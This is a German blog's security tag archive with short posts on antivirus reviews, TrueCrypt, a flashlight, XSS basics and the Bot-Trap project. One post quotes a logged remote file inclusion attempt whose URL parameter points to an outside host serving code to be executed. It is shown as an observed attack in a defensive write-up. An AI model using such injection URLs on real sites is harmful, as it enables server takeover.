Tag Archives: sicherheit

Kaspersky 2011 – Schutz bis ins nächste Jahr

Es ist ja ein allgemeiner Trend, um ein zukunftsorientiertes Arbeiten und die Aktualität zu unterstreichen, die Jahreszahl vom kommenden Jahr in den Produktnamen mit aufzunehmen. Aber sei dies mal außen vor gelassen.

Überblick

Der russische Sicherheitsspezialist Kaspersky Lab hat im Juni seinen neuen Virenschutz “Kaspersky Anti-Virus 2011” auf den Markt gebracht. Kaspersky optimiert seine Produkte seit 13 Jahren und konnte durch gute Leistung in der Schädlings-Erkennung sich einen guten Ruf erarbeiten. Scheinbar kommt die Technologie des Herstellers auch unter Lizenz bei andere Anti-Viren-Programmen zum Einsatz. Außerdem bietet Kaspersky auch eine Software für den MAC an.

Wichtig zu wissen ist, dass die Version 11 sich stark an unerfahrene PC-Neulinge orientiert. So ist die Installation und Handhabung der Software im Vergleich zum Vorgänger erneut vereinfacht worden. Dies merkt man besonders bei der Programmoberfläche während der Verwendung. Für Computer-Experten wird die Anwendung etwas umständlich wahrgenommen werden, aber man kann sich eben am besten an nur eine Zielgruppe richten. Continue reading

LED LENSER M7 – Knüppeldick

[Trigami-Review] Es gab bereits zwei vergangene Berichte bezüglich einer anderen LED-Lampe von LED Lenser auf Webregard. Diesmal könnte man sagen, es handelt sich um eine Taschenlampe welche die Eigenschaften der beiden bereits vorgestellten vereint. Es handelt sich dabei um eine relativ kleine Taschenlampe, etwas dicker als gewöhnlich mit aber einer sehr starken Leuchtkraft. Neben der Leuchtkraft ist der riesige Radius die zweite eigentliche Eigenschaft. Also machen die Leuchtkraft und der große Lichtkegel diese Leuchte “LED Lenser M7” aus. Doch Dazu kommt noch die verwendete Smart Light Technology.

Unter Smart Light Technology kann man sich einen Chip vorstellen, welcher wie ein kleiner Computer die Aufgaben für die Lampe aufnimmt und korrekt verarbeitet und steuert. So kann man über gezielte Kombinationen verschiedene Leuchtmodi erreichen. Konkret sind das folgende Modi welche im Einsatz aufgelistete Funktionen umfassen.

  • Easy Mode – 100% Leuchtpower sowie 15% bis 100% Dimm
  • Tactical Defense Mode – 100% Leuchtpower und Defense-Strobe (Blitzlicht)
  • Professional Mode – 100%, 15% – 100%, slow-blink, S.O.S., Defense-Strobe

Dadurch ist gewährleistet, dass für den speziellen Anwendungsfall kein unnötiges Drücken notwendig ist um zum gewünschten Modus zu gelangen. Für den Einfachen Einsatz reicht vielleicht nur die Regelung der Leuchtkraft aus, Sicherheitsdienste wollen mit voller Leistung arbeiten und in der Wildnis will man alles verwenden können.

Ein Modus lässt sich einfach “verkehrt herum”, wenn man so will verändern. Das heißt, man drückt bei ausgeschaltetem Zustand der Lampe vier Mal kurz drauf ohne durchzudrücken und macht sie beim 5. Mal an. Dann meldet sich die Lampe durch kurzes Blinken, dass der Modus umgeschalten wurde.

Besonders schön finde ich wie bereits bei anderen Produkten des Unternehmens, das einfach Vor- und Zurückziehen des Kopfes, um dadurch den Leuchtkegel zu verändern um Beispielsweise zu fokussieren.

Continue reading

CSS / XSS Angriffe erklärt

Unter Cross Site Scripting versteht man das unbemerkte Einbinden von Skripten auf fremden Webseiten. Sprich der Angreifer verändert die Webseite so, dass sein gewünschter Code beim Aufrufen durch andere nichts wissenden Besuchern ausgeführt wird. Diese Gefahr ist allgegenwärtig und kann jeden Webmaster treffen, ein Grund mehr das Thema zu behandeln.

Damit man überhaupt mal weiß wie sowas funktioniert um sich auch entsprechend schützen zu können, muss man sich unbedingt mal den Artikel auf erich-kachel.de durchlesen. Dort werden interessante und wichtige Informationen im Bezug auf XSS vermittelt. Das kann auch für normale Surfer interessant sein, da diese dann mehr darauf achten können wie ein infezierter Link aussieht.

Was ermöglicht JavaScript (mittels XSS):

  • das Ändern der gesamten Seitenstruktur,
  • das Einbinden zusätzlichen JavaScript-Codes,
  • das Erzeugen beliebiger HTML-Elemente,
  • das Umleiten von Formularen und Links,
  • das Auslesen von Authentifizierungs-Daten,
  • das Senden und Empfangen von Daten und
  • das Auslesen der Tastenanschläge

Hier weiterlesen.

Rundumschutz für den Heim-PC

g_data_inetsecurity.jpgZahlreiche Internet-Security-Suiten werben überall mit ihrem Können und der Fähigkeit alles sicherer zu machen, doch was ist das von Tatsache? Die Ausbeute ist ernüchternd, im aktuellen Test der Zeitschrift c’t kam der Rundumschutz von G Data und Trend Micro am besten voran. Schon im letzten Anti-Viren-Pogramm Test hat sich das Magazin für G Data entschieden.

Für G Data sprechen folgende Punkte:

  • Schnelle Signatur Erkennung von Schadsoftware und Ad- und Spyware
  • Sehr schnelle Update und Reaktionszeit auf Veränderungen durch den Hersteller
  • Backup, Verschlüsselung und Online-Backup möglich
  • Spam wurde rund 89 % erkannt
  • Erkennt 7 von 10 Phishing Seiten
  • akzeptable Kindersicherung
  • Gute Ergebnisse im Erkennen von Viren und Spyware-Programme
  • Gute Ergebnisse als Firewall unter Windows XP

Der Test ist in der c’t Nummer 7 vom 17.03.2008 auf Seite 169 zu lesen. Insgesamt wurden 12 Angebote getestet.

Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt: Continue reading

TrueCrypt – Systempartition verschlüsseln

truecrypt50.jpgMit der aktuellen Version 5.0 des von mir hoch geschätzten Tools TrueCrypt kann man jetzt auch die Windows-Partition oder gesamte Festplatte verschlüsseln und somit ein Maximum an Sicherheit (eben auch für Konfigurationsdateien) erreichen. Ein Bootloader verlangt dann beim Start die Eingabe des Passwortes und schaltet somit die Daten frei.

Das freie Programm besitzt, weil es ja gerade Open-Source ist, nicht wie alle kommerziellen Verschlüsselungs-Programme einen Backdoor für die Regierung. Meine Nummer Eins wenn es um Datenverschlüsselung geht. Continue reading

htaccesseditor.com – Bequem und einfach .htaccess erstellen

htaccesseditro.jpgDer japanische Dienst htaccesseditor.com von Ryoken&Mannen bietet die Möglichkeit ganz im Web 2.0 Stil seine eigene .htaccess Datei zu erstellen. Man kann zwischen den Möglichkeiten “Standart Authentifizierung” (Verzeichnisschutz), Fehlerseiten, Weiterleitungen und Zugriffsbeschränkungen einzustellen.

Das ganze wird in ein nettes Design mit Schnellklick-Funktion gepackt. Dadurch wird es Benutzerfreundlich und interessant. Jedoch muss man beachten, dass ohne den Zusatz gr.shtml an der Domain der Service mehr oder weniger unleserlich wird.

Hitmeister.de – Alternative zu Ebay?

hitmeister-logo.pngAls neuer Ableger der Hitflip Media Trading GmbH aus Köln verspricht sich als neuer Marktplatz zum Kauf und Verkauf von gebrauchten und neuen Medien wie DVDs, Bücher, CDs, Spiele, Hörbücher. In Zukunft sollen auch noch andere Produkte vertrieben werden. Im Gegensatz zu Hitflip.de tauscht man auf Hitmeister.de keine Produkte, sondern Kauft diese wie bei Amazon.de oder Ebay.de ein.

Der große Unterschied soll in der Garantie und Sicherheit des Shops liegen:

Käufer sind über die Hitmeister-Produktgarantie geschützt. Wird ein Artikel nicht geliefert oder entspricht der Artikel nicht der Beschreibung des Verkäufers, erhält der Käufer sein Geld zurück. Verkäufer erhalten die Hitmeister-Zahlungsgarantie. Durch das Hitmeister-Treuhandsystem ist der Verkäufer gegen das Risiko des Zahlungsausfalls geschützt. Bei Streitfällen zwischen Käufern und Verkäufern vermittelt Hitmeister.

Wenn das so stimmt und man einen direkteren Kontakt anders wie bei Ebay hat, kann sich diese neue deutsche Produktbörse gut etablieren. Ein weitere Pluspunkt sind die einheitlichen Versandkosten (1,90 bis 4,90 Euro). Es kann mit Kreditkarte, Überweisung, Moneybookers und Paypal bezahlt werden. Continue reading

Wo setzen automatisierte Hack-Scripts an?

Mit Hilfe des Bot-Trap Projektes ist es mir möglich einen kleinen Blick auf das automatisierte Vorgehen von Hackern zu werfen. Dabei ist auf Anhieb zu sehen, dass diese natürlich auf quell-offene Anwendungen setzen. Beliebt sind Blogs und Foren.

Zusätzlich gehe ich davon aus, dass ein Teil der Angriffe gar nicht gestartet wird. Entweder ist es nicht ersichtlich um welche Webanwendung es sich bei meiner Domain handelt, da geblockt durch Bot-Trap oder dass die derzeitige Automatisierung nicht für WordPress ausgelegt ist und gleich “weiter geht”.

Dennoch konnte ich eine gewisse Anzahl versuchter Angriffe in den letzten 30 Tagen verzeichnen. Sollte eine Injektion von fremden Code funktionieren, versucht der Großteil über einfache PHP-Scripte erstmal die Server-Eigenschaften auszuspionieren. Der kleinere Teil legt gleich mit voll ausgebauten PHP-Scripten los, welche zB. von Kaspersky sofort als “Trojan program Backdoor.PHP.Small.o” oder ähnlichem markiert werden.

Ein Diagramm mit den Anteilen verschiedener Methoden:
Continue reading

Bot-Trap – Türsteher für unerwünschte Gäste

Bei meinem nächtlichen Internetspaziergang bin ich auf das Projekt Bot-Trap gestoßen. Ziel dieses Projekts ist es Schädlinge in Form von automatisierten Hack-Skripten oder Content-Grabbern von seiner Website auszuschließen.bottrap.jpg

  1. Das Ganze läuft wie folgt in fünf Schritten ab, der Webseiten-Betreiber registriert sich in dem Forum und stellt sich möglichst ausführlich vor. Daraufhin wird dieser nach Ermessen der Moderatoren akzeptiert oder eben nicht.
    Das hat den Vorteil, dass böse Bot-Betreiber keine direkte Einsicht in dem Programmcode des Projektes haben sollen.
  2. Der Betreiber bekommt eine PHP-Datei welche er in jede andere Datei einbinden muss.
  3. Wenn ein Test erfolgreich war, werden nun alle von der Community zusammengetragenen böse User Agents sowie bestimmte IP-Adressen gesperrt.
    Durch mehrere Sicherheitsebenen wird versuch, dass ein Google-Bot oder normale Internetsurfer nicht ausgeschlossen werden. An erster Stelle wird im Forum ein (nicht) Schädling gemeldet, dieser wird von den Moderatoren Überprüft und somit (ent)gesperrt. Unbekannte Bots werden im Zweifelsfall gesperrt!
  4. In einem unregelmäßigen Rhythmus wird die PHP-Datei automatisch aktualisiert.
    Der Benutzer kann das auch manuell machen. Es besteht auch die Möglichkeit selbst bestimmte User-Agents oder IP-Adressen für die eigene Webseite zu (ent)sperren. Continue reading